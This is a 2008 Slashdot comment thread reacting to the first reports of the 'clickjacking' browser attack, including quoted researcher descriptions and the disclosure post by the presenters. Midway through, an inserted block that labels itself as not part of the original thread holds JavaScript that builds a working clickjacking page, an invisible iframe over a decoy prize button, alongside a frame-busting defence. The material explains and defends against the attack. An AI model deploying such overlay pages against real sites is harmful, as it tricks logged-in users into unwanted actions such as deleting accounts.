Alarm Raised For "Clickjacking" Browser Exploit 308

Shipment Date writes "ZDNet's Zero Day blog has some new information on what looks like a scary new browser exploit/threat affecting all the major desktop platforms — Microsoft Internet Explorer, Mozilla Firefox, Apple Safari, Opera and Adobe Flash. The threat, called Clickjacking, was to be discussed at the OWASP conference but was nixed at the last minute at the request of affected vendors. From the article: 'In a nutshell, it's when you visit a malicious website and the attacker is able to take control of the links that your browser visits. The problem affects all of the different browsers except something like lynx. The issue has nothing to do with JavaScript so turning JavaScript off in your browser will not help you.'"
  • by Anonymous Coward on Thursday September 25, 2008 @03:21PM (#25156655)

    *crickets*

  • Go Lynx! (Score:2, Funny)

    by ag3ntugly ( 636404 ) *
    I knew there was a reason I liked lynx
  • by Anonymous Coward on Thursday September 25, 2008 @03:23PM (#25156705)
    was some weird mouse-mastubation scenario. *shudders*
    • Re: (Score:3, Funny)

      by couchslug ( 175151 )

      "The first thing I thought of was some weird mouse-mastubation scenario."

      "Mastubation"?? I'm picturing small rodents with catheters....

      Even my capybara Lemmiwinks thinks THAT is sick.

    • was some weird mouse-mastubation scenario. *shudders*

      "Mousturbation"? Ok, I'll shut up now.

  • Turn to Lynx? (Score:2, Insightful)

    Well, they can't steal clicks from a browser without clicks
  • Information (Score:5, Insightful)

    by asCii88 ( 1017788 ) on Thursday September 25, 2008 @03:24PM (#25156725) Homepage
    You call this "information"? It's not even clear what the exploit is about.
    • by eln ( 21727 ) on Thursday September 25, 2008 @03:32PM (#25156883)

      It's very similar to the DNS issue from a couple of months back: It's a hugely scary thing that will doom the Internet, but because we're responsible we can't tell you what it is in any detail. However, if you don't patch your browser immediately (patch not yet available), you are fucked.

      Have a nice day.

      • by Kaptainkid ( 1366757 ) on Thursday September 25, 2008 @03:58PM (#25157355)
        For additional support information. Click this link. LOL
      • Re:Information (Score:5, Insightful)

        by OriginalArlen ( 726444 ) on Thursday September 25, 2008 @04:04PM (#25157441)

        There's a big difference. The first public news of the Kaminsky DNS issue was with the release of Microsoft's Patch Tuesday DNS update, with simultaneous patches from ISC for BIND and the other affected nameservers. Dan organised all that with the help of CERT and the DNS server vendor/distributors, without leaks. Once the patches and a vague description were out, people put two and two together pretty quickly - IIRC from the BlackHat preso, the first correct solution Kaminsky received was within 48 hours - and shrewd guesses were being made within two weeks (followed by the unfortunate leak which broadly confirmed the guess.) It sounds like the cat is well and truly out of the bag here, already, and there are no patches yet. Apart from the people at the conference, there's enough detail in the sources the ZDNet blog links to to make it pretty clear which direction the shrewd guesses (and testing) will have started on.

        Looking on the bright side, more browsers than nameservers auto-update themselves...

        (Incidentally the reason the Internet wasn't destroyed by the Kaminsky bug was precisely because of all the prior coordination and then unequivocal "patch now" messages from multiple credible sources (CERT, Vixie, Microsoft, the other respected researchers Dan explained it to under NDA, etc.) And you ARE still fucked in the long run anyway, because DNS is still spoofable by a determined attacker (which probably means one who's going after a very high value target) in the absence of DNSSEC. Hence the (by Fed terms, frantic) haste with which the .gov root is being signed at last.

        Have a great day!

      • Re: (Score:3, Funny)

        by Hatta ( 162192 )

        Sounds like our economy right about now.

      • Re: (Score:3, Interesting)

        by Mad Merlin ( 837387 )

        But here's the best part (from the article):

        The issue has nothing to do with JavaScript so turning JavaScript off in your browser will not help you.

        Ebay, for example, would be vulnerable to this since you could embed javascript into the web page, although, javascript is not required to exploit this.

        In the meantime, the only fix is to disable browser scripting and plugins. We realize this doesn't give people much technical detail to go on, but it's the best we can do right now.

        So, the exploit has nothing to do

        • Re: (Score:3, Interesting)

          by enoz ( 1181117 )

          I would have classed that article as FUD, except that there are too many obvious contradictions.

          Instead it just looks like some incoherent disinformation from someone who does not know the difference between a browser and a plugin.

          a scary new browser exploit/threat affecting all the major desktop platforms - Microsoft Internet Explorer, Mozilla Firefox, Apple Safari, Opera and Adobe Flash.

          That's where I stopped taking the article seriously. Unfortunately that was also the first paragraph.

    • Re:Information (Score:5, Informative)

      by AKAImBatman ( 238306 ) * on Thursday September 25, 2008 @03:45PM (#25157129) Homepage Journal

      It's about using IFRAMES + CSS to make confusing visual elements that cause users to perform actions they didn't think they were performing. Feel better? ;-)

        by HikingStick ( 878216 ) on Thursday September 25, 2008 @04:01PM (#25157393)
        You mean like the way the new Slashdot interface causes a lot of the comments to overlap, so you think you're clicking on that +3 Interesting one and you end up clicking a -1 Troll on the RNC veep candidate in a bikini...except much worse, I mean.
      • by lysergic.acid ( 845423 ) on Thursday September 25, 2008 @04:12PM (#25157545) Homepage
        i still don't get it. could you give an analogy involving cars?
        • Re:Information (Score:5, Insightful)

          by AKAImBatman ( 238306 ) * on Thursday September 25, 2008 @04:22PM (#25157713) Homepage Journal

          Sure. Imagine you're in a car showroom looking at a super-expensive car. It looks great and the price is pretty good. So you tell the dealer you'll take the car. Except when you get in the car, you realize that someone had put a cardboard cutout in front of the car. The car you got in was actually an economy vehicle. Except now it's too late to undo your purchase!

          Here's another one: Let's say you've got a bunch of buttons on your dash. Most of them control the radio, but one controls the ejection seat. While you're away, some neighbor kids from MIT think it's funny to come over and rewire the buttons on your radio. Now when you press the button to turn on your radio, you actually get ejected from the car. NOT FUNNY!

          Better? :-P

        • How about this: Your name is Heather and you're trapped in Silent Hill. After beating the crap out of a monster, you realize that the whole spooky playground was some CSS delusion and you ended up screwing innocent people's lives.

          That would've been a pretty cool ending for SH3, btw, but I hope it helps explaining what this exploit really is about. So, in other words,
          if you see a flash ad saying "click to win a prize", now you can know what the prize is ;-)

    • Re: (Score:3, Funny)

      by AaxelB ( 1034884 )
      And, suspiciously, TFA itself is hidden behind a link! Do they really expect us to click it??

      ...I did click it. What a useless article.

      It's a fundamental flaw with the way your browser works and cannot be fixed with a simple patch.

      Oh no! There's nothing we can do!

      In the meantime, the only fix is to disable browser scripting and plugins.

      Uh... wha? I thought it didn't have to do with browser scripting and plugins?

      So it's big and scary and you can't protect against it, except by taking basic precautions to protect yourself against it. I see.

    • by cmacb ( 547347 )

      Researchers are beginning to raise an alarm for what looks like a scary new browser exploit/threat affecting all the major desktop platforms -- Microsoft Internet Explorer, Mozilla Firefox, Apple Safari, Opera and Adobe Flash.

      Obviously the word "platform" is hot in media circles these days.

      I noticed Linux isn't in there. Does that mean Linux is not a platform? If I run Firefox on Linux am I safe? If I run Firefox on OS X am I safe?

      This is one reason I don't follow the news on ZDnet any more.

  • by null etc. ( 524767 ) on Thursday September 25, 2008 @03:24PM (#25156729)
    Oh great. Expect a resurgence in rickrolls. No one can protect you!
  • FF 3.0.2 safe? (Score:2, Informative)

    by DavidR1991 ( 1047748 )
    Fairly certain this is one of the listed fixes for 3.0.2, but I could be wrong (Or is this _another_ kind of clickjacking flaw?)
  • Summary wrong (Score:5, Informative)

    by mazarin5 ( 309432 ) on Thursday September 25, 2008 @03:25PM (#25156769) Journal

    The issue has nothing to do with JavaScript so turning JavaScript off in your browser will not help you.'

    The quote from the article says you can protect yourself by disabling scripting:

    In the meantime, the only fix is to disable browser scripting and plugins. We realize this doesn't give people much technical detail to go on, but it's the best we can do right now.

    • Re:Summary wrong (Score:5, Informative)

      by Free the Cowards ( 1280296 ) on Thursday September 25, 2008 @03:28PM (#25156813)

      The first quote is also from the article, so it's not the summary's fault. The article is vague and self-contradictory, so I'm calling bullshit until and unless further details are given.

      • Probably just some asshole trying to make some word popular so later when the people they're trying to impress say it in conversation, they can go "Yeah?! Clickjacking! Did you know I came up with that word!?"

      • Re:Summary wrong (Score:5, Informative)

        by jesser ( 77961 ) on Thursday September 25, 2008 @03:38PM (#25157003) Homepage Journal

        The zdnet article is pretty vague, but I think it refers to the problem detailed in this message from Michal Zalewski [whatwg.org]:

        "A malicious page in domain A may create an IFRAME pointing to an application in domain B, to which the user is currently authenticated with cookies. The top-level page may then cover portions of the IFRAME with other visual elements to seamlessly hide everything but a single UI button in domain B, such as 'delete all items', 'click to add Bob as a friend', etc. It may then provide own, misleading UI that implies that the button serves a different purpose and is a part of site A, inviting the user to click it."

        Disabling JavaScript won't prevent the attack. It will break some mitigations, though!

        • Re:Summary wrong (Score:5, Interesting)

          by jesser ( 77961 ) on Thursday September 25, 2008 @03:46PM (#25157139) Homepage Journal

          FWIW, this isn't exactly a new idea. roc and I discussed it back in 2002 [mozilla.org].

          I'm glad it's getting attention now, though. Any fix is likely to require changes to specs.

        • Re: (Score:2, Informative)

          by hvm2hvm ( 1208954 )
          If that's the case, then all you have to do is look at the address bar and see if you really are on the site you are seeing. If you click on a link and find yourself looking at your page on a social network while the address says "spam.dyndns.com" you should realize something is wrong.
          • by kesuki ( 321456 )

            and what do you do when it's a highly page ranked, 'google' shopping store, that is actually a phishing site on a 'build an estore' site that transfers your data to a legitimate store and simultaneously harvests your cc data to sell on the black market?

            hrm, smarty pants, what do you do then. happened to me, buying a cell phone data cable on the internet instead of in store where they charge triple the value of a data transfer cable...

            those 'build a estore' sites all look like legit domains... and on the surfa

            • Re: (Score:3, Informative)

              What you do is you see an unknown charge on your credit card, call the company, cancel the card, and get a new one. Total cost to you: 15 minutes and zero dollars.

              Honestly, why are people so afraid of having their credit card numbers stolen? Unless you're utterly negligent and don't report fraudulent purchases, you have no liability!

              • Re: (Score:3, Informative)

                by anotherone ( 132088 )

                Actually under certain circumstances you could be liable for up to $50, but yeah usually it's not a big deal.

                • Re: (Score:3, Informative)

                  I'm pretty sure that's only if your actual signature is on a receipt somewhere, which is fairly difficult to arrange when your number gets stolen over the internet.

          • But by that time, the damage is done. Suppose the link you clicked was a "Delete my account" button, for example. Also, the parent window should still be covering most of the iframe, so the only part of the site you'd see is the small box where the link was.
        • by HTH NE1 ( 675604 )

          I've wanted to know when an iframe is embedded in my page and where it comes from so I can evaluate whether I can trust it, especially since my credit card company's website decided to embed the login form inside such an iframe. Further, if I attempt to Show Only This Frame on the iframe, the site redirects me to an error page.

          Putting iframe[src]:before { content: attr(src); } in my userContent.css has not worked, though a[name]:before { content: "[#] "; } a[name]:active:before { content: "[#" attr(name) "

      • Re:Summary wrong (Score:5, Informative)

        by sootman ( 158191 ) on Thursday September 25, 2008 @03:46PM (#25157153) Homepage Journal

        +1 for "vague and self-contradictory."

        From TFA: "The issue has nothing to do with JavaScript so turning JavaScript off in your browser will not help you." and then "The exploit requires DHTML." As far as I know, DHTML requires a client-side scripting language--the most popular of which (only?) is JavaScript.

    • Re:Summary wrong (Score:5, Informative)

      by kesuki ( 321456 ) on Thursday September 25, 2008 @03:38PM (#25157013) Journal

      the problem is actually in dhtml, but javascript makes the exploit 'much easier'

      hence, the attack sites will all be using javascript, because it's easier than writing it entirely in dhtml just to score an extra click from the guy who disabled javascript because he doesn't trust it.

      BTW: in theory even sites like slashdot can be infected because the attack applies to all CSS coded sites. nice.

      oh, BTW, if you have NoScript installed, this vulnerability can only force clicks within the same domain, since cross site code is automatically disabled.. AFAIK the only way to disable CSS is to use obsolete browsers like lynx.

  • by Anonymous Coward on Thursday September 25, 2008 @03:25PM (#25156773)
    Finally I have a legitimate excuse for all the pr0n sites that are in my browser history. No honey, it isn't me, it's a browser exploit! I swear!
    • by Roberticus ( 1237374 ) on Thursday September 25, 2008 @03:47PM (#25157159)

      Finally I have a legitimate excuse for all the pr0n sites that are in my browser history. No honey, it isn't me, it's a browser exploit! I swear!

      I don't know how things work for you, but saying that I just got clickjacked is only going to get me into more trouble, not less.

  • Bullshit? (Score:5, Insightful)

    by sakdoctor ( 1087155 ) on Thursday September 25, 2008 @03:26PM (#25156779) Homepage

    I don't think this exploit really exists. A cross browser cross platform exploit that doesn't use javascript?
    Won't be losing any sleep over this one.

  • Premature claim (Score:5, Interesting)

    by clang_jangle ( 975789 ) * on Thursday September 25, 2008 @03:29PM (#25156829) Journal

    scary new browser exploit/threat affecting all the major desktop platforms

    I didn't find that information in TFA or in any of the TFAs linked in TFA (here [adobe.com] here [ckers.org] here [blogspot.com] here [webadminblog.com]). Though it may be so; it sounds like this exploit makes use of the browser's access to the clipboard.
    Elinks FTW!

  • From reading TFA (I know, silly me) this seems to be pretty much fear-mongering with a fancy new buzzword. "Clickjacking" oooo scary!

    Until some real technical details come up I'd say nothing to see here, move along.
  • OWASP (Score:5, Interesting)

    by Lord Ender ( 156273 ) on Thursday September 25, 2008 @03:32PM (#25156881) Homepage

    was to be discussed at the OWASP conference but was nixed at the last minute at the request of affected vendors

    Well, add OWASP to the list of security organizations with no integrity. It's clear they care about their sponsors, not their members.

    • Re: (Score:2, Informative)

      by skis ( 920891 )
      Actually, the presenters were the ones that made that decision.

      So, after much deliberation we opted to pull our speech voluntarily, due to the extremely neutered information we'd have to be sharing. We'd much rather share the full breadth of what we found when it can be discussed more openly as to not diminish the danger of the flaw by only talking about small parts of the issue.
      -from ha.ckers.org
  • FTA: "The issue has nothing to do with JavaScript...", "Javascript is not required to exploit this....", "The exploit requires DHTML." Anyone care to educate me on these seemingly contradictory statements? (and yes, I know DHTML could utilize a different, non-JS scripting language). What else is DHTML but HTML, scripts that run in the browser's scripting engine, and CSS?

  • by big whiffer ( 906132 ) on Thursday September 25, 2008 @03:33PM (#25156907) Homepage
    i didn't even click on this story; someone must want me to read this...
  • by Tackhead ( 54550 ) on Thursday September 25, 2008 @03:34PM (#25156925)

    Microsoft Internet Explorer, Mozilla Firefox, Apple Safari, Opera and Adobe Flash.

    Web browser, Web browser, Web browser, Web browser, and cross-platform method for running code delivered from untrusted sources.

    From TFA:

    "The threat, called Clickjacking, was to be discussed at the OWASP NYC AppSec 2008 Conference but, at the request of Adobe and other affected vendors, the talk was nixed until a comprehensive fix is ready."

    One vendor is, unlike the others, mentioned by name. It happens to be the vendor that ships The One Thing That Is Not Like The Others.

    Also from TFA:

    "According to someone who attended the semi-restricted OWASP presentation, the issue is indeed zero-day, affects all the different browsers and has nothing to do with JavaScript:"

    and

    "In the meantime, the only fix is to disable browser scripting and plugins. We realize this doesn't give people much technical detail to go on, but it's the best we can do right now."

    Now we're at a quandary. Your humble correspondent is at a loss to even speculate as to the nature of a technology that Ffirstly isn't Javashit, but which can conceivably be invoked by web content regardless of which web browser is in use, but lastly can be secured against by disabling hated plug-ins.

    • Mod it up, boys.
    • by Chysn ( 898420 ) on Thursday September 25, 2008 @03:41PM (#25157065)

      > Now we're at a quandary. Your humble
      > correspondent is at a loss to even speculate as
      > to the nature of a technology that Ffirstly isn't
      > Javashit, but which can conceivably be invoked by
      > web content regardless of which web browser is in
      > use, but lastly can be secured against by
      > disabling hated plug-ins.

      It's a Flash exploit. I found a proof-of-concept by clicking around TFA, and it promised that the Flash movie would take over my clipboard, forcing me to close the browser window. I'm on Firefox 3.0.2, and the "proof-of-concept" did nothing.

      At least nothing obvious. I suppose I could have been rootkitted.

      • Oh, do you think so?

        (sorry ;)

        Firstly lastly hated plug-ins.

      • by stevied ( 169 )

        I'm not sure the clipboard hijacking is anything to do with this new 'clickjacking' issue - it came up about a month ago, I'm fairly sure it was on slashdot at the time.

        I'm really not sure what that link ("SEE: Adobe Flash ads launching clipboard hijack attack") is doing in the middle of the ZDNet post.

    • ...the lack of Flash support in Mobile Safari is now a security feature!
  • by rwa2 ( 4391 ) * on Thursday September 25, 2008 @03:40PM (#25157041) Homepage Journal

    Using the links browser in a terminal with mouse support is almost exactly like using a browser with images turned off...

    Witness:
    http://www.jikos.cz/~mikulas/links/screenshots/png.html [jikos.cz]

  • ok - i read TFA, scanned all the links blogs, their trackbacks and comments and from what i've seen there is no real info on what this is. Thinking about it for 2 minutes I had this idea that this will be best chance ever to get rid of IE6. My hope is that all the browser vendors (including MS) have conspired that maybe 3 weeks of making scary "clickjacking" news and pushing them to the main media outlets will eventually raise awareness to let go of that horrible thing that's keeping the web from really evo
  • Scary? (Score:5, Insightful)

    by pyrr ( 1170465 ) on Thursday September 25, 2008 @03:45PM (#25157123)

    I'm trying to think of the ways this could be used to cause harm, so far the biggest threat I see is to the pay-per-click ad model, since this would be great for clickfraud. Other than that, a website could bounce you to another page on their site that you didn't intend to go to, and possibly overwhelm your browser & bandwidth with a redirect loop. I can see a hint of an issue in the way frames might be used with this exploit and 3rd-party sites (as noted in the article), but that seems to be a bit of a stretch since the original site would still be sending someone away from their site in another redirect. Plenty of sites who make the choice to be annoying already make you go through a little effort to break out of their frames when you go to an external site from one of their links, it's not the end of the world.

    I'd like to hear other folks' ideas on ways this may be used for an exploit that could do damage to anything other than Google's bottom-line. Until I hear a more compelling one, this exploit doesn't strike me as being the least bit "scary". A "small potential nuisance" might be a more apt description, since it would be fairly simple for end users to just ignore its effects.

    • Re: (Score:3, Interesting)

      by Nathanbp ( 599369 )

      How about if a malicious site puts amazon.com in an iframe positioned so as to induce you to hit the 1-click order button on some expensive camera or something? Using an Amazon referral link to themselves, of course.

    • Re: (Score:3, Interesting)

      by ThreeGigs ( 239452 )

      It apparently doesn't have to redirect you away from the 'main' page you're seeing. It can all happen in a 'hidden' iFrame.

      I can think of a lot of web pages where clicking could have a real effect. Especially on sites where users keep themselves logged in. It appears as if they can direct your click to any spot or object on the 3rd party site.

      Ready to DIGG a story you know nothing about?
      Bid on an eBay auction?
      Delete all your old Yahoo/Gmail messages?
      What about any site that uses GETs to send a message to th

  • by RockMFR ( 1022315 ) on Thursday September 25, 2008 @03:45PM (#25157133)
    Details at 11.
  • by Skapare ( 16644 ) on Thursday September 25, 2008 @03:55PM (#25157317) Homepage

    I've seen situations that otherwise look like benign layout bugs, where two or more hyperlinks or other clickable objects end up being overlaid on each other. It's not clear which one would be activated until you click. If someone intentionally did this AND obscured the object they wanted the victim to click, and made the other object more attractive, people might be doing such clicking. This could be easily done with CSS on one page, but there's no advantage since both links are just part of the same page. I don't think frames would do this. However, IFRAMES might do this on a cross "page" basis. The perp makes an attractive link that overlays an iframe that is loaded from another page, so the act of clicking gets the victim to effectively click on the other page. This loads something else in the iframe, but from the perspective of that other web site, it was a click on their page (based on the referer value). The simple exploit would get people to click on an ad, and it would not be visible to the ad vendor which page was doing the exploit.

  • My take (Score:5, Informative)

    by Spy der Mann ( 805235 ) on Thursday September 25, 2008 @04:05PM (#25157455) Homepage Journal

    From google cache:

    Clickjacking

    There's been a bit of drama over the last week or so around the upcoming world OWASP conference in New York. It's surrounding a talk that Jeremiah and I were planning on doing the first day of the conference. Jeremiah and I have been working on some interesting browser security issues which also affect a lot of downstream people/websites/technologies as well. Sounds like a good talk right? We thought so too!

    Alas, it turns out that some of the issues we found weren't just a little bad - they were a lot bad. So bad, in fact, that we felt compelled to do some responsible disclosure. One issue led into another issue into another and poof - we have at least two and probably more incoming vendor patches at a yet to-be-determined date. And we've only worked with a few vendors. So… yah. It's pretty bad.

    As you may have guessed the first is a browser company, Microsoft (to be expected since it's a browser issue to begin with). The second is Adobe - who have been working closely with us on this one since we first told them about the problem. We have been working on proof of concept code since before Blackhat and finally got our ducks in a row with real working exploit code a few weeks ago. And that is pretty much when the problems started. None of the issues we found relating to the browser were particularly easy to fix, it turns out.

    The related issues we found that affect websites (instead of browsers) are thankfully slightly easier to deal with on a one off basis, but that too is going to be a problem. There are a lot of much easier hacks out there against websites for sure, but what we've been working on breaks some previously good security measures. The correct solve will not be patching every web-site on earth. Instead it will likely end up being a browser patch against every major browser. The idea of every webmaster in the world patching their own sites is a non-starter. Although I'm sure lots of people are going to run out and patch their sites rather than wait for the normal browser patch and release cycle for all browsers everywhere. We've discussed the high level concern with both Microsoft and Mozilla and they concur independently that this is a tough problem with no easy solve in sight at the moment.

    So, after much deliberation we opted to pull our speech voluntarily, due to the extremely neutered information we'd have to be sharing. We'd much rather share the full breadth of what we found when it can be discussed more openly as to not diminish the danger of the flaw by only talking about small parts of the issue. There will still be holes in many websites due to this problem even after the short term patches are available, but we'd rather a few of the more critical problems get patched before we go public.

    However, I must stress, this is not an evil "the man is trying to keep us hackers down" situation, a la Michael Lynn vs. Cisco, or Chris Paget vs. HID, or MIT vs. MBTA and so on. We proactively decided it was better to pull the speech ourselves for the time being and for anyone who was looking forward to the speech all I can say is I hope to make it up to you once the vendors are in a better spot. It wasn't an easy decision but it really feels like the best option we have given the current situation. If you're desperate for a way to patch your browser from the issue disable scripting and plugins for the time being. More to come.

    This entry was posted on Monday, September 15th, 2008 at 5:36 pm and is filed under Webappsec. You can leave a response as well.

    And from the Adobe report:

    Thanks to Jeremiah Grossman and Robert "RSnake" Hansen

    Robert "RSnake" Hansen and Jeremiah Grossman recently shared with us some information they were planning to include in an upcoming presentation at the OWASP NYC AppSec confer

    • Errata (Score:3, Interesting)

      After reading AKAImBatman's comment [slashdot.org], I realized it's not a DOM/scripting vulnerability, but just the ability to hide a link behind flash or an animated GIF content.

      Kudos to AKAImBatman for understanding what this was about - and Kudos to the hackers for both discovering such an ingenious exploit and for working with the companies to fix it.

  • by Ambush Commander ( 871525 ) on Thursday September 25, 2008 @04:17PM (#25157615)

    In its most primitive form, it basically involves taking an iframe, figuring out where the link part/form part is, and then tricking the user into clicking it.

    This seems very clunky and hacky, but I suspect that the speakers at the OWASP talk have gotten this technique to work well enough so that it is both transparent and highly effective. Can you think of a website that needs you to click, say, a play button in order to view content? That click may be hijacked through an invisible iframe to execute an action on another website.

    The good folks at Google recently raised this topic on the WHATWG mailing list, you can read more about it here: http://lists.whatwg.org/pipermail/whatwg-whatwg.org/2008-September/016284.html [whatwg.org]
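The iframe-overlay attack that jesser's quoted Zalewski message and the comment above describe, written out as an added example. This is not code from the thread, the ZDNet post or the Hansen/Grossman research: the target URL, the button coordinates and the decoy position are constructed assumptions (a real target has to be loaded and measured first), and the frame-busting function at the end is the generic script-based mitigation a site could deploy, not any vendor's patch.

```javascript
// Added example, not part of the original Slashdot thread.
// Part 1 builds the attacker page: a visible decoy button with the victim
// site loaded in an invisible iframe stacked on top of it, so the click the
// user thinks is on the decoy lands on the victim's real button and is sent
// with the user's cookies for that origin. No script is needed on the
// attacker page, which is why turning JavaScript off does not stop it.
// Part 2 is the frame-busting check a framed site could run, which does
// need script and therefore stops working when scripting is disabled.

// Where the real button renders inside the victim page, as the attacker
// would have measured it in their own browser. Constructed numbers and a
// hypothetical URL for the example.
const TARGET = {
  url: 'https://victim.example/account/delete',
  button: { x: 640, y: 412, w: 120, h: 32 },   // the "Delete account" button
  frameWidth: 1024,
  frameHeight: 768,
};

// Offset for the iframe so the target button sits exactly under the decoy
// at (decoyX, decoyY). Negative values pull the victim page up and left.
function frameOffset(target, decoyX, decoyY) {
  return {
    left: decoyX - target.button.x,
    top: decoyY - target.button.y,
  };
}

// The attacker's HTML. The decoy is z-index 1, the transparent iframe is
// z-index 2, so the iframe receives the click. Zalewski's variant is the
// inverse: an opaque attacker page covering everything in the iframe except
// the one button. Both are pure HTML and CSS.
function buildClickjackPage(target, decoyX, decoyY) {
  const { left, top } = frameOffset(target, decoyX, decoyY);
  const { w, h } = target.button;
  return [
    '<!doctype html>',
    '<html><body style="margin:0">',
    `<button style="position:absolute;left:${decoyX}px;top:${decoyY}px;` +
      `width:${w}px;height:${h}px;z-index:1">Click to win a prize</button>`,
    `<iframe src="${target.url}" scrolling="no" frameborder="0" ` +
      `style="position:absolute;left:${left}px;top:${top}px;` +
      `width:${target.frameWidth}px;height:${target.frameHeight}px;` +
      'opacity:0;z-index:2"></iframe>',
    '</body></html>',
  ].join('\n');
}

// Part 2: frame-busting. `win` is the page's window object, passed in so the
// logic can be exercised outside a browser. Returns true when the page was
// framed and the top window has been pointed back at this page.
function isFramed(win) {
  return win.top !== win.self;
}

function frameBust(win) {
  if (!isFramed(win)) return false;
  win.top.location = win.self.location;  // replace the attacker's page with ours
  return true;
}

if (typeof window !== 'undefined') {
  frameBust(window);                                   // in a browser: defend this page
} else {
  console.log(buildClickjackPage(TARGET, 200, 150));   // in Node: print the PoC page
}
```

Opened in a browser where the user is logged in to the target, the generated page delivers one real click on the victim's button. The frame-busting half only runs where scripting is enabled, which is why NoScript users in this thread lose that protection and rely on its cross-site restrictions instead; script-based busting is also known to be defeatable by a framing page that interferes with the navigation, and the browser-side fix the write-up anticipated eventually arrived as a response header the site sends (X-Frame-Options, later CSP frame-ancestors) rather than script the site runs.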

  • "In the meantime, the only fix is to disable browser scripting and plugins. We realize this doesn't give people much technical detail to go on, but it's the best we can do right now. "

    What's one malicious/annoying script from another? I turned them all off, years ago, and magically problems with trojans, annoying popups, and flashy/dodgy adverts all went away.

    At work, I put CNN on my restricted sites list to explicitly prohibit the site from running scripts. I'll take my biased news without the long page

  • From a comment [zdnet.com] on TFA:

    NoScript in its default configuration can defeat most of the possible attack scenarios (i.e. the most practical, effective and dangerous): see this comment by Jeremiah himself: http://ha.ckers.org/blog/20080915/clickjacking/#comment-84820 [ckers.org]. ...
